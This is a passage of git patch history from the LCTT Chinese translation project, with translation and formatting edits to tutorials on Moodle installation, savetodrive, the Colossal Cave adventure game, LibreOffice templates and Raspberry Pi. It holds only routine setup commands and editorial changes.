-[http://www.zdnet.com/article/linux-totally-dominates-supercomputers/](http://www.theitstuff.com/wp-content/uploads/2017/10/authenticate-google-account.jpg)
+[请求获得 Google Drive 的使用权限](http://www.theitstuff.com/wp-content/uploads/2017/10/authenticate-google-account.jpg)
### *第三步*
你将会再一次看到下面的页面,此时仅仅需要输入下载链接在链接框中,并且点击 “Upload”
-[savetodrive download file directly to cloud](http://www.theitstuff.com/wp-content/uploads/2017/10/6-2.png)
+[savetodrive 直接给 Google Drive 上传文件](http://www.theitstuff.com/wp-content/uploads/2017/10/6-2.png)
你将会开始看到上传进度条,可以看到上传速度达到了 48 Mbps,所以上传我这个 1.5 GB 的文件需要 30 至 35 秒。一旦这里完成了,进入你的 Google Drive 你就可以看到刚才上传的文件。
-[google drive savetodrive](http://www.theitstuff.com/wp-content/uploads/2017/10/7-2-e1508772046583.png)
+[Google Drive savetodrive](http://www.theitstuff.com/wp-content/uploads/2017/10/7-2-e1508772046583.png)
这里的文件中,文件名开头是 *miui* 的就是我刚才上传的,现在我可以用一个很快的速度下载下来。
-[how to download miui update from browser](http://www.theitstuff.com/wp-content/uploads/2017/10/8-e1508772110385.png)
+[如何从浏览器上下载 MIUI 更新](http://www.theitstuff.com/wp-content/uploads/2017/10/8-e1508772110385.png)
可以看到我的下载速度大概是 5 Mbps ,所以我下载这个文件只需要 5 到 6 分钟。
所以就是这样的,我经常用这样的方法下载文件,最令人惊讶的是,这个服务是完全免费的。
----
+
+----
+
+
via: http://www.theitstuff.com/save-files-directly-google-drive-download-10-times-faster
作者:[Rishabh Kandari](http://www.theitstuff.com/author/reevkandari)
-译者:[Drshu]
+译者:[Drshu][10]
校对:[校对者ID]((null))
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+
+
+[1]: http://www.theitstuff.com/wp-content/uploads/2017/10/1-2-e1508771706462.png
+[2]: https://savetodrive.net/
+[3]: http://www.savetodrive.net
+[4]: http://www.theitstuff.com/wp-content/uploads/2017/10/3-1.png
+[5]: http://www.theitstuff.com/wp-content/uploads/2017/10/authenticate-google-account.jpg
+[6]: http://www.theitstuff.com/wp-content/uploads/2017/10/6-2.png
+[7]: http://www.theitstuff.com/wp-content/uploads/2017/10/7-2-e1508772046583.png
+[8]: http://www.theitstuff.com/wp-content/uploads/2017/10/8-e1508772110385.png
+[9]: http://www.theitstuff.com/author/reevkandari
+[10]: https://github.com/Drshu
+[11]: https://github.com/%E6%A0%A1%E5%AF%B9%E8%80%85ID
+[12]: https://github.com/LCTT/TranslateProject
+[13]: https://linux.cn/
+
+[image-1]: http://www.theitstuff.com/wp-content/uploads/2017/11/Save-Files-Directly-To-Google-Drive-And-Download-10-Times-Faster.jpg
+[image-2]: http://www.theitstuff.com/wp-content/uploads/2017/10/1-2-e1508771706462.png
+[image-3]: http://www.theitstuff.com/wp-content/uploads/2017/10/3-1.png
+[image-4]: http://www.theitstuff.com/wp-content/uploads/2017/10/authenticate-google-account.jpg
+[image-5]: http://www.theitstuff.com/wp-content/uploads/2017/10/6-2.png
+[image-6]: http://www.theitstuff.com/wp-content/uploads/2017/10/7-2-e1508772046583.png
+[image-7]: http://www.theitstuff.com/wp-content/uploads/2017/10/8-e1508772110385.png
\ No newline at end of file
From d8756f98785e35b9b4e71524cd1dea16b198962c Mon Sep 17 00:00:00 2001
From: datastruct
Date: Sat, 6 Jan 2018 22:54:51 +0800
Subject: [PATCH 107/371] Update 20171214 How to Install Moodle on Ubuntu
16.04.md
---
...4 How to Install Moodle on Ubuntu 16.04.md | 98 +++++++++----------
1 file changed, 45 insertions(+), 53 deletions(-)
diff --git a/sources/tech/20171214 How to Install Moodle on Ubuntu 16.04.md b/sources/tech/20171214 How to Install Moodle on Ubuntu 16.04.md
index 9a6a2e9a98..326b558044 100644
--- a/sources/tech/20171214 How to Install Moodle on Ubuntu 16.04.md
+++ b/sources/tech/20171214 How to Install Moodle on Ubuntu 16.04.md
@@ -1,71 +1,64 @@
-Translating by stevenzdg988
+Translated by stevenzdg988
-How to Install Moodle on Ubuntu 16.04
+怎样在 Ubuntu 16.04 下安装 Moodle(魔灯”)
======
-![How to Install Moodle on Ubuntu 16.04][1]
+![怎样在 Ubuntu 16.04 下安装 Moodle```“魔灯”```][1]
-Step-by-step Installation Guide on how to Install Moodle on Ubuntu 16.04. Moodle (acronym of Modular-object-oriented dynamic learning environment') is a free and open source learning management system built to provide teachers, students and administrators single personalized learning environment. Moodle is built by the Moodle project which is led and coordinated by [Moodle HQ][2]
+关于如何在 Ubuntu 16.04 上按照指南逐步安装 Moodle 请继续往下看。Moodle (模块化面向对象动态学习环境的简称)是一种免费开源学习管理系统,为教师、学生和管理员提供个性化的学习环境。Moodle 由 Moodle 项目创建,由 [Moodle 总部][2]统一领导和协调。
-,
+**Moodle有很多非常实用的功能,比如:**
-**Moodle comes with a lot of useful features such as:**
+ * 现代和易于使用的界面
+ * 个性化仪表盘
+ * 协作工具和活动
+ * 一体式日历
+ * 简单的文本编辑器
+ * 进度跟踪
+ * 公告
+ * 不胜枚举…
- * Modern and easy to use interface
- * Personalised Dashboard
- * Collaborative tools and activities
- * All-in-one calendar
- * Simple text editor
- * Track progress
- * Notifications
- * and many more…
-
-
-
-In this tutorial we will guide you through the steps of installing the latest version of Moodle on an Ubuntu 16.04 VPS with Apache web server, MySQL and PHP 7.
-
-### 1. Login via SSH
+在本教程中,我们将指导您在 Ubuntu 16.04 VPS 上利用 Apache web服务器、MySQL 和 PHP 7 安装最新版本的 Moodle。
+### 1. 通过 SSH 登录
First of all, login to your Ubuntu 16.04 VPS via SSH as user root
+首先,利用```root(是 Linux 和 Unix 系统中的超级管理员用户帐户,该帐户拥有整个系统至高无上的权力,所有对象他都可以操作。)```用户通过 SSH 登录到 Ubuntu 16.04 VPS
+### 2. 更新操作系统软件包
-### 2. Update the OS Packages
-
-Run the following command to update the OS packages and install some dependencies
+运行以下命令更新系统软件包并安装一些依赖软件
```
apt-get update && apt-get upgrade
apt-get install git-core graphviz aspell
```
-### 3. Install Apache Web Server
+### 3. 安装 Apache Web Server```(Apache WEB 服务器)```
-Install Apache web server from the Ubuntu repository
+利用下面命令,从 Ubuntu 软件仓库安装 Apache Web 服务器
```
apt-get install apache2
```
-### 4. Start Apache Web Server
+### 4. 启动 Apache Web Server
-Once it is installed, start Apache and enable it to start automatically upon system boot
+一旦安装完毕,启动 Apache 并使它能够在系统启动时自动启动,利用下面命令:
```
systemctl enable apache2
```
-### 5. Install PHP 7
+### 5. 安装 PHP 7
-Next, we will install PHP 7 and some additional PHP modules required by Moodle
+接下来,我们将安装 PHP 7 和 Moodle 所需的一些额外的 PHP 模块,命令是:
```
apt-get install php7.0 libapache2-mod-php7.0 php7.0-pspell php7.0-curl php7.0-gd php7.0-intl php7.0-mysql php7.0-xml php7.0-xmlrpc php7.0-ldap php7.0-zip
```
-### 6. Install and Configure MySQL Database Server
+### 6. 安装和配置 MySQL Database Server```MySQL 数据库服务器```
-Moodle stores most of its data in a database, so we will install MySQL database server
+Moodle 将大部分数据存储在数据库中,所以我们将利用以下命令安装 MySQL 数据库服务器
```
apt-get install mysql-client mysql-server
```
-
-After the installation, run the `mysql_secure_installation` script to set your MySQL root password and secure your MySQL installation.
-
-Login to the MySQL server as user root and create a user and database for the Moodle installation
+安装完成后,运行`mysql_secure_installation`脚本配置 MySQL 根用户```root```密码并确保 MySQL 得以安装。
+利用根用户```root```登录到 MySQL 服务器,并为 Moodle 创建一个数据库以及能访问它的用户,以下是具体操作指令:
```
mysql -u root -p
mysql> CREATE DATABASE moodle;
@@ -74,28 +67,28 @@ mysql> FLUSH PRIVILEGES;
mysql> \q
```
-Don't forget to replace 'PASSWORD' with an actual strong password.
+一定要记得将`‘PASSWORD’`替换成一个安全性高强点的密码。
-### 7. Get Moodle from GitHub repository
+### 7. 从 GitHub ```(是一个面向开源及私有软件项目的托管平台)``` 知识库获取 Moodle
-Next, change the current working directory and clone Moodle from their official GitHub repository
+接下来,切换到当前工作目录并从 GitHub 官方知识库(存储库)中复制 Moodle`(Git是一个开源的分布式版本控制系统,可以有效、高速的处理从很小到非常大的项目版本管理。其中要利用到命令 git。以下同)`
```
cd /var/www/html/
git clone https://github.com/moodle/moodle.git
```
-Go to the '/moodle' directory and check all available branches
+切换到`“/moodle”`目录,检查所有可用的分支
```
cd moodle/
git branch -a
```
-Select the latest stable version (currently it is MOODLE_34_STABLE) and run the following command to tell git which branch to track or use
+选择最新稳定版本(目前它是 MOODLE_34_ ),运行以下命令告诉 git 哪个分支可以跟踪或使用
```
git branch --track MOODLE_34_STABLE origin/MOODLE_34_STABLE
```
-and checkout the specified version
+并切换至这个特定版本
```
git checkout MOODLE_34_STABLE
@@ -103,20 +96,20 @@ Switched to branch 'MOODLE_34_STABLE'
Your branch is up-to-date with 'origin/MOODLE_34_STABLE'.
```
-Create a directory for the Moodle data
+为存储 Moodle 数据创建目录
```
mkdir /var/moodledata
```
-Set the correct ownership and permissions
+正确设置其所有权和访问权限
```
chown -R www-data:www-data /var/www/html/moodle
chown www-data:www-data /var/moodledata
```
-### 8. Configure Apache Web Server
+### 8. 配置 Apache Web Server
-Create Apache virtual host for your domain name with the following content
+使用以下内容为您的域名创建 Apache 虚拟主机
```
nano /etc/apache2/sites-available/yourdomain.com.conf
@@ -135,7 +128,7 @@ nano /etc/apache2/sites-available/yourdomain.com.conf
```
-save the file and enable the virtual host
+保存文件并启用虚拟主机
```
a2ensite yourdomain.com
@@ -144,25 +137,24 @@ To activate the new configuration, you need to run:
service apache2 reload
```
-Finally, reload the web server as suggested, for the changes to take effect
+最后,重启 Apache WEB 服务器,以使配置生效
```
service apache2 reload
```
-### 9. Follow the on-screen instructions and complete the installation
+### 9. 接下来按照提示完成安装
-Now, go to `http://yourdomain.com` and follow the on-screen instructions to complete the Moodle installation. For more information on how to configure and use Moodle, you can check their [official documentation][4].
+现在,点击“http://yourdomain.com”`(在浏览器的地址栏里输入以上域名并访问 Apache WEB 服务器)`,按照提示完成Moodle的安装。有关如何配置和使用 Moodle 的更多信息,您可以查看其[官方文档][4]。
-You don't have to install Moodle on Ubuntu 16.04, if you use one of our [optimized Moodle hosting][5], in which case you can simply ask our expert Linux admins to install and configure the latest version of Moodle on Ubuntu 16.04 for you. They are available 24×7 and will take care of your request immediately.
-
-**PS.** If you liked this post on how to install Moodle on Ubuntu 16.04, please share it with your friends on the social networks using the buttons on the left or simply leave a reply below. Thanks.
+如果您使用我们的[优化的 Moodle 托管主机服务][5],您不必在 Ubuntu 16.04 上安装 Moodle,在这种情况下,您只需要求我们的专业 Linux 系统管理员在 Ubuntu 16.04 上安装和配置最新版本的 Moodle。他们将提供 24×7 及时响应的服务。
+**PS.** 如果你喜欢这篇关于如何在 Ubuntu 16.04 上安装 Moodle 的帖子,请在社交网络上与你的朋友分享,使用左边的按钮或者留下你的回复。谢谢。
--------------------------------------------------------------------------------
via: https://www.rosehosting.com/blog/how-to-install-moodle-on-ubuntu-16-04/
作者:[RoseHosting][a]
-译者:[译者ID](https://github.com/译者ID)
+译者:[stevenzdg988](https://github.com/stevenzdg988)
校对:[校对者ID](https://github.com/校对者ID)
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
From 370ccdcd0aedfeb5d7f647844f8049fefd4d5c7b Mon Sep 17 00:00:00 2001
From: stevenzdg988
Date: Sat, 6 Jan 2018 22:57:44 +0800
Subject: [PATCH 108/371] Translated by stevenzdg988
---
.../tech/20171214 How to Install Moodle on Ubuntu 16.04.md | 0
1 file changed, 0 insertions(+), 0 deletions(-)
rename {sources => translated}/tech/20171214 How to Install Moodle on Ubuntu 16.04.md (100%)
diff --git a/sources/tech/20171214 How to Install Moodle on Ubuntu 16.04.md b/translated/tech/20171214 How to Install Moodle on Ubuntu 16.04.md
similarity index 100%
rename from sources/tech/20171214 How to Install Moodle on Ubuntu 16.04.md
rename to translated/tech/20171214 How to Install Moodle on Ubuntu 16.04.md
From 8a426b9b5c3d3bda2cbd3d22b1d3a0626ee6108b Mon Sep 17 00:00:00 2001
From: Ezio
Date: Sat, 6 Jan 2018 23:08:14 +0800
Subject: [PATCH 109/371] =?UTF-8?q?=E5=B0=8F=E4=BF=AE=E6=94=B9?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
.../tech/20171214 How to Install Moodle on Ubuntu 16.04.md | 4 +---
1 file changed, 1 insertion(+), 3 deletions(-)
diff --git a/translated/tech/20171214 How to Install Moodle on Ubuntu 16.04.md b/translated/tech/20171214 How to Install Moodle on Ubuntu 16.04.md
index 326b558044..0422dbb2c3 100644
--- a/translated/tech/20171214 How to Install Moodle on Ubuntu 16.04.md
+++ b/translated/tech/20171214 How to Install Moodle on Ubuntu 16.04.md
@@ -1,6 +1,4 @@
-Translated by stevenzdg988
-
-怎样在 Ubuntu 16.04 下安装 Moodle(魔灯”)
+怎样在 Ubuntu 16.04 下安装 Moodle(“魔灯”)
======
![怎样在 Ubuntu 16.04 下安装 Moodle```“魔灯”```][1]
From 7b8fc136caf251110fc2aead56b6c7254707e93b Mon Sep 17 00:00:00 2001
From: Shucheng <741932183@qq.com>
Date: Sat, 6 Jan 2018 23:12:53 +0800
Subject: [PATCH 110/371] Fixed image fomat and made it dispaly directly
---
...y To Google Drive And Download 10 Times Faster.md | 12 ++++++------
1 file changed, 6 insertions(+), 6 deletions(-)
diff --git a/translated/tech/20171120 Save Files Directly To Google Drive And Download 10 Times Faster.md b/translated/tech/20171120 Save Files Directly To Google Drive And Download 10 Times Faster.md
index 7105b9fb8c..566424de98 100644
--- a/translated/tech/20171120 Save Files Directly To Google Drive And Download 10 Times Faster.md
+++ b/translated/tech/20171120 Save Files Directly To Google Drive And Download 10 Times Faster.md
@@ -4,7 +4,7 @@
最近我不得不给我的手机下载更新包,但是当我开始下载的时候,我发现安装包过于庞大。大约有 1.5 GB
-[使用 Chrome 下载 MIUI 更新](http://www.theitstuff.com/wp-content/uploads/2017/10/1-2-e1508771706462.png)
+![使用 Chrome 下载 MIUI 更新](http://www.theitstuff.com/wp-content/uploads/2017/10/1-2-e1508771706462.png)
考虑到这个下载速度至少需要花费 1 至 1.5 小时来下载,并且说实话我并没有这么多时间。现在我下载速度可能会很慢,但是我的 ISP 有 Google Peering (Google 对等操作)。这意味着我可以在所有的 Google 产品,例如Google Drive, YouTube 和 PlayStore 中获得一个惊人的速度。
@@ -18,24 +18,24 @@
### *第二步*
前往链接[savetodrive](http://www.savetodrive.net) 并且点击相应位置以验证身份。
-[savetodrive 将文件保存到 Google Drive ](http://www.theitstuff.com/wp-content/uploads/2017/10/3-1.png)
+![savetodrive 将文件保存到 Google Drive ](http://www.theitstuff.com/wp-content/uploads/2017/10/3-1.png)
这将会请求获得使用你 Google Drive 的权限,点击 “Allow”
-[请求获得 Google Drive 的使用权限](http://www.theitstuff.com/wp-content/uploads/2017/10/authenticate-google-account.jpg)
+![请求获得 Google Drive 的使用权限](http://www.theitstuff.com/wp-content/uploads/2017/10/authenticate-google-account.jpg)
### *第三步*
你将会再一次看到下面的页面,此时仅仅需要输入下载链接在链接框中,并且点击 “Upload”
-[savetodrive 直接给 Google Drive 上传文件](http://www.theitstuff.com/wp-content/uploads/2017/10/6-2.png)
+![savetodrive 直接给 Google Drive 上传文件](http://www.theitstuff.com/wp-content/uploads/2017/10/6-2.png)
你将会开始看到上传进度条,可以看到上传速度达到了 48 Mbps,所以上传我这个 1.5 GB 的文件需要 30 至 35 秒。一旦这里完成了,进入你的 Google Drive 你就可以看到刚才上传的文件。
-[Google Drive savetodrive](http://www.theitstuff.com/wp-content/uploads/2017/10/7-2-e1508772046583.png)
+![Google Drive savetodrive](http://www.theitstuff.com/wp-content/uploads/2017/10/7-2-e1508772046583.png)
这里的文件中,文件名开头是 *miui* 的就是我刚才上传的,现在我可以用一个很快的速度下载下来。
-[如何从浏览器上下载 MIUI 更新](http://www.theitstuff.com/wp-content/uploads/2017/10/8-e1508772110385.png)
+![如何从浏览器上下载 MIUI 更新](http://www.theitstuff.com/wp-content/uploads/2017/10/8-e1508772110385.png)
可以看到我的下载速度大概是 5 Mbps ,所以我下载这个文件只需要 5 到 6 分钟。
From 248323d7e5b3159f02d9b3aea5fd086243689c21 Mon Sep 17 00:00:00 2001
From: wxy
Date: Sun, 7 Jan 2018 01:14:00 +0800
Subject: [PATCH 111/371] PRF:20171214 The Most Famous Classic Text-based
Adventure Game.md
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
@yixunx 翻译的很好,用心了~
---
...amous Classic Text-based Adventure Game.md | 49 ++++++++++---------
1 file changed, 26 insertions(+), 23 deletions(-)
diff --git a/translated/tech/20171214 The Most Famous Classic Text-based Adventure Game.md b/translated/tech/20171214 The Most Famous Classic Text-based Adventure Game.md
index 17dfb304a6..2419f94e1f 100644
--- a/translated/tech/20171214 The Most Famous Classic Text-based Adventure Game.md
+++ b/translated/tech/20171214 The Most Famous Classic Text-based Adventure Game.md
@@ -1,28 +1,32 @@
-最有名的经典文字冒险游戏
+巨洞冒险:史上最有名的经典文字冒险游戏
======
-**巨洞冒险**,又名 **ADVENT**、**Clossal Cave** 或 **Adventure**,是八十年代初到九十年代末最受欢迎的基于文字的冒险游戏。这款游戏还作为史上第一款“互动小说”类游戏而闻名。在 1976 年,一个叫 **Will Crowther** 的程序员开发了这款游戏的一个早期版本,之后另一位叫 **Don Woods** 的程序员改进了这款游戏,为它添加了许多新元素,包括计分系统以及更多的幻想角色和场景。这款游戏最初是为 **PDP-10** 开发的,这是一个历史悠久的大型计算机。后来,它被移植到普通家用台式电脑上,比如 IBM PC 和 Commodore 64。游戏的最初版使用 Fortran 开发,之后在八十年代初它被微软加入到 MS-DOS 1.0 当中。
+
+[巨洞冒险](https://zh.wikipedia.org/wiki/%E5%B7%A8%E6%B4%9E%E5%86%92%E9%9A%AA),又名 ADVENT、Clossal Cave 或 Adventure,是八十年代初到九十年代末最受欢迎的基于文字的冒险游戏。这款游戏还作为史上第一款“互动小说”类游戏而闻名。在 1976 年,一个叫 Will Crowther 的程序员开发了这款游戏的一个早期版本,之后另一位叫 Don Woods 的程序员改进了这款游戏,为它添加了许多新元素,包括计分系统以及更多的幻想角色和场景。这款游戏最初是为 PDP-10 开发的,这是一种历史悠久的大型计算机。后来,它被移植到普通家用台式电脑上,比如 IBM PC 和 Commodore 64。游戏的最初版使用 Fortran 开发,之后在八十年代初它被微软加入到 MS-DOS 1.0 当中。
![](https://www.ostechnix.com/wp-content/uploads/2017/12/Colossal-Cave-Adventure-1.jpeg)
-1995 年发布的最终版本 **Adventure 2.5** 从来没有可用于现代操作系统的安装包。它已经几乎绝版。万幸的是,在多年之后身为开源运动提倡者的 **Eric Steven Raymond** 得到了原作者们的同意之后将这款经典游戏移植到了现代操作系统上。他把这款游戏开源并将源代码以 **”open-adventure“** 之名托管在 GitLab 上。
+1995 年发布的最终版本 Adventure 2.5 从来没有可用于现代操作系统的安装包。它已经几乎绝版。万幸的是,在多年之后身为开源运动提倡者的 Eric Steven Raymond (ESR)得到了原作者们的同意之后将这款经典游戏移植到了现代操作系统上。他把这款游戏开源并将源代码以 “open-adventure” 之名托管在 GitLab 上。
-你在这款游戏的主要目标是找到一个传言中藏有大量宝藏和金子的洞穴并活着离开它。玩家在这个虚拟洞穴中探索时可以获得分数。一共可获得的分数是 430 点。这款游戏的灵感主要来源于原作者 **Will Crowther** 丰富的洞穴探索的经历。他曾经积极地在洞穴中冒险,特别是肯塔基州的猛犸洞。因为游戏中的洞穴结构大体基于猛犸洞,你也许会注意到游戏中的场景和现实中的猛犸洞的相似之处。
+你在这款游戏的主要目标是找到一个传言中藏有大量宝藏和金子的洞穴并活着离开它。玩家在这个虚拟洞穴中探索时可以获得分数。一共可获得的分数是 430 点。这款游戏的灵感主要来源于原作者 Will Crowther 丰富的洞穴探索的经历。他曾经经常在洞穴中冒险,特别是肯塔基州的猛犸洞。因为游戏中的洞穴结构大体基于猛犸洞,你也许会注意到游戏中的场景和现实中的猛犸洞的相似之处。
### 安装巨洞冒险
-Open Adventure 在 [**AUR**][1] 上有面对 Arch 系列操作系统的安装包。所以我们可以在 Arch Linux 或者像 Antergos 和 Manjaro Linux 等基于 Arch 的发行版上使用任何 AUR 辅助程序安装这款游戏。
+Open Adventure 在 [AUR][1] 上有面对 Arch 系列操作系统的安装包。所以我们可以在 Arch Linux 或者像 Antergos 和 Manjaro Linux 等基于 Arch 的发行版上使用任何 AUR 辅助程序安装这款游戏。
+
+使用 [Pacaur][2]:
-使用 [**Pacaur**][2]:
```
pacaur -S open-adventure
```
-使用 [**Packer**][3]:
+使用 [Packer][3]:
+
```
packer -S open-adventure
```
-使用 [**Yaourt**][4]:
+使用 [Yaourt][4]:
+
```
yaourt -S open-adventure
```
@@ -32,52 +36,53 @@ yaourt -S open-adventure
首先安装依赖项:
在 Debian 和 Ubuntu 上:
+
```
sudo apt-get install python3-yaml libedit-dev
```
-在 Fedora 上:
+在 Fedora 上:
```
sudo dnf install python3-PyYAML libedit-devel
```
-你也可以使用 pip 来安装 PyYAML:
+你也可以使用 `pip` 来安装 PyYAML:
+
```
sudo pip3 install PyYAML
```
安装好依赖项之后,用以下命令从源代码编译并安装 open-adventure:
+
```
git clone https://gitlab.com/esr/open-adventure.git
-```
-```
make
-```
-```
make check
```
-最后,运行 ‘advent’ 程序开始游戏:
+最后,运行 `advent` 程序开始游戏:
+
```
advent
```
-在 [**Google Play store**][5] 上还有这款游戏的安卓版。
+在 [Google Play 商店][5] 上还有这款游戏的安卓版。
### 游戏说明
要开始游戏,只需在终端中输入这个命令:
+
```
advent
```
-你会看到一个欢迎界面。按 “y” 来查看教程,或者按 “n“ 来开始冒险之旅。
+你会看到一个欢迎界面。按 `y` 来查看教程,或者按 `n` 来开始冒险之旅。
![][6]
-游戏在一个小砖房前面开始。玩家需要使用由一到两个简单的英语单词单词组成的命令来控制角色。要移动角色,只需输入 **in**、 **out**、**enter**、**exit**、**building**、**forest**、**east**、**west**、**north**、**south**、**up** 或 **down** 等指令。
+游戏在一个小砖房前面开始。玩家需要使用由一到两个简单的英语单词单词组成的命令来控制角色。要移动角色,只需输入 `in`、 `out`、`enter`、`exit`、`building`、`forest`、`east`、`west`、`north`、`south`、`up` 或 `down` 等指令。
-比如说,如果你输入 **”south“** 或者简写 **”s“**,游戏角色就会向当前位置的南方移动。注意每个单词只有前五个字母有效,所以当你需要输入更长的单词时需要使用缩写,比如要输入 **northeast** 时,只需输入 NE(大小写均可)。要输入 **southeast** 则使用 SE。要捡起物品,输入 **pick**。要进入一个建筑物或者其他的场景,输入 **in**。要从任何场景离开,输入 **exit**,诸如此类。当你遇到危险时你会受到警告。你也可以使用两个单词的短语作为命令,比如 **”eat food“**、**”drink water“**、**”get lamp“**、**”light lamp“**、**”kill snake“** 等等。你可以在任何时候输入 **”help“** 来显示游戏帮助。
+比如说,如果你输入 `south` 或者简写 `s`,游戏角色就会向当前位置的南方移动。注意每个单词只有前五个字母有效,所以当你需要输入更长的单词时需要使用缩写,比如要输入 `northeast` 时,只需输入 NE(大小写均可)。要输入 `southeast` 则使用 SE。要捡起物品,输入 `pick`。要进入一个建筑物或者其他的场景,输入 `in`。要从任何场景离开,输入 `exit`,诸如此类。当你遇到危险时你会受到警告。你也可以使用两个单词的短语作为命令,比如 `eat food`、`drink water`、`get lamp`、`light lamp`、`kill snake` 等等。你可以在任何时候输入 `help` 来显示游戏帮助。
![][8]
@@ -87,19 +92,17 @@ advent
我打通了许多关卡并在路上探索了各式各样的场景。我甚至找到了金子,还被一条蛇和一个矮人袭击过。我必须承认这款游戏真是非常让人上瘾,简直是最好的时间杀手。
-如果你安全地带着财宝离开了洞穴,你会取得游戏胜利,并获得财宝全部的所有权。你在找到财宝的时候也会获得部分的奖励。要提前离开你的冒险,输入 **”quit“**。要暂停冒险,输入 **”suspend“**(或者 ”pause“ 或 ”save“)。你可以在之后继续冒险。要看你现在的进展如何,输入 **”score“**。记住,被杀或者退出会导致丢分。
+如果你安全地带着财宝离开了洞穴,你会取得游戏胜利,并获得财宝全部的所有权。你在找到财宝的时候也会获得部分的奖励。要提前离开你的冒险,输入 `quit`。要暂停冒险,输入 `suspend`(或者 `pause` 或 `save`)。你可以在之后继续冒险。要看你现在的进展如何,输入 `score`。记住,被杀或者退出会导致丢分。
祝你们玩得开心!再见!
-
-
--------------------------------------------------------------------------------
via: https://www.ostechnix.com/colossal-cave-adventure-famous-classic-text-based-adventure-game/
作者:[SK][a]
译者:[yixunx](https://github.com/yixunx)
-校对:[校对者ID](https://github.com/校对者ID)
+校对:[wxy](https://github.com/wxy)
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
From bac5b530f286b0b8c424efde6008c4b4ab73cb5f Mon Sep 17 00:00:00 2001
From: wxy
Date: Sun, 7 Jan 2018 01:14:39 +0800
Subject: [PATCH 112/371] PUB:20171214 The Most Famous Classic Text-based
Adventure Game.md
@yixunx https://linux.cn/article-9209-1.html
---
.../20171214 The Most Famous Classic Text-based Adventure Game.md | 0
1 file changed, 0 insertions(+), 0 deletions(-)
rename {translated/tech => published}/20171214 The Most Famous Classic Text-based Adventure Game.md (100%)
diff --git a/translated/tech/20171214 The Most Famous Classic Text-based Adventure Game.md b/published/20171214 The Most Famous Classic Text-based Adventure Game.md
similarity index 100%
rename from translated/tech/20171214 The Most Famous Classic Text-based Adventure Game.md
rename to published/20171214 The Most Famous Classic Text-based Adventure Game.md
From 94745a45ce210a26ff09b3a4ff2707a00775612a Mon Sep 17 00:00:00 2001
From: darksun
Date: Sun, 7 Jan 2018 03:01:37 +0800
Subject: [PATCH 113/371] remove useless links
---
...eate an e-book chapter template in LibreOffice Writer.md | 6 ------
1 file changed, 6 deletions(-)
diff --git a/sources/tech/20171018 How to create an e-book chapter template in LibreOffice Writer.md b/sources/tech/20171018 How to create an e-book chapter template in LibreOffice Writer.md
index 7b0a5bd1c5..8c6a5c8072 100644
--- a/sources/tech/20171018 How to create an e-book chapter template in LibreOffice Writer.md
+++ b/sources/tech/20171018 How to create an e-book chapter template in LibreOffice Writer.md
@@ -36,7 +36,6 @@ Like the template itself, styles provide a consistent look and feel for your doc
The standard LibreOffice template comes with a number of styles that you can fiddle with to suit your needs. To do that, press **F11** to open the **Styles and Formatting** window.
-### [lo-paragraph-style.png][3]
![LibreOffice styles and formatting][4]
@@ -47,7 +46,6 @@ Right-click on a style and select **Modify** to edit it. Here are the main style
Style Font Spacing/Alignment Heading 1 Liberation Sans, 36 pt 36 pt above, 48 pt below, aligned left Heading 2 Liberation Sans, 18 pt 12 pt above, 12 pt below, aligned left Heading 3 Liberation Sans, 14 pt 12 pt above, 12 pt below, aligned left Text Body Liberation Sans, 12 pt 12 pt above, 12 pt below, aligned left Footer Liberation Sans, 10 pt Aligned center
-### [lo-styles-in-action.png][5]
![LibreOffice styles in action][6]
@@ -70,7 +68,6 @@ Before you start writing, create a folder on your computer that will hold all th
When you're ready to write, fire up LibreOffice Writer and select **File > New > Templates**. Then select your template from the list and click **Open**.
-### [lo-template-list.png][7]
![LibreOffice Writer template list][8]
@@ -109,13 +106,10 @@ via: https://opensource.com/article/17/10/creating-ebook-chapter-template-libreo
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
[a]:https://opensource.com/users/scottnesbitt
-[1]:/file/374456
[2]:https://opensource.com/sites/default/files/images/life-uploads/lo-page-style.png (LibreOffice Page Style window)
-[3]:/file/374461
[4]:https://opensource.com/sites/default/files/images/life-uploads/lo-paragraph-style.png (LibreOffice styles and formatting window)
[5]:/file/374466
[6]:https://opensource.com/sites/default/files/images/life-uploads/lo-styles-in-action.png (Example of LibreOffice styles)
-[7]:/file/374471
[8]:https://opensource.com/sites/default/files/images/life-uploads/lo-template-list.png (Template list - LibreOffice Writer)
[9]:https://help.libreoffice.org/Writer/Working_with_Master_Documents_and_Subdocuments
[10]:https://help.libreoffice.org/Common/Export_as_PDF
From 8c1e5294728bdc87878dd02785a1c8058b81ad45 Mon Sep 17 00:00:00 2001
From: darksun
Date: Sun, 7 Jan 2018 03:18:38 +0800
Subject: [PATCH 114/371] =?UTF-8?q?=E9=87=8D=E6=96=B0=E6=8E=92=E7=89=88?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
sources/tech/20170502 A beginner-s guide to Raspberry Pi 3.md | 3 +--
1 file changed, 1 insertion(+), 2 deletions(-)
diff --git a/sources/tech/20170502 A beginner-s guide to Raspberry Pi 3.md b/sources/tech/20170502 A beginner-s guide to Raspberry Pi 3.md
index 1cc43f9627..7a0e9b4805 100644
--- a/sources/tech/20170502 A beginner-s guide to Raspberry Pi 3.md
+++ b/sources/tech/20170502 A beginner-s guide to Raspberry Pi 3.md
@@ -1,6 +1,7 @@
A beginner’s guide to Raspberry Pi 3
======
![](https://images.techhive.com/images/article/2017/03/raspberry2-100711632-large.jpeg)
+
This article is part of a weekly series where I'll create new projects using Raspberry Pi 3. The first article of the series focusses on getting you started and will cover the installation of Raspbian, with PIXEL desktop, setting up networking and some basics.
### What you need:
@@ -20,8 +21,6 @@ There are many Linux-based operating systems available for Raspberry Pi that you
Download NOOBS from [this link][1] on your system. It's a compressed .zip file. If you're on MacOS, just double click on it and MacOS will automatically uncompress the files. If you are on Windows, right-click on it, and select "extract here."
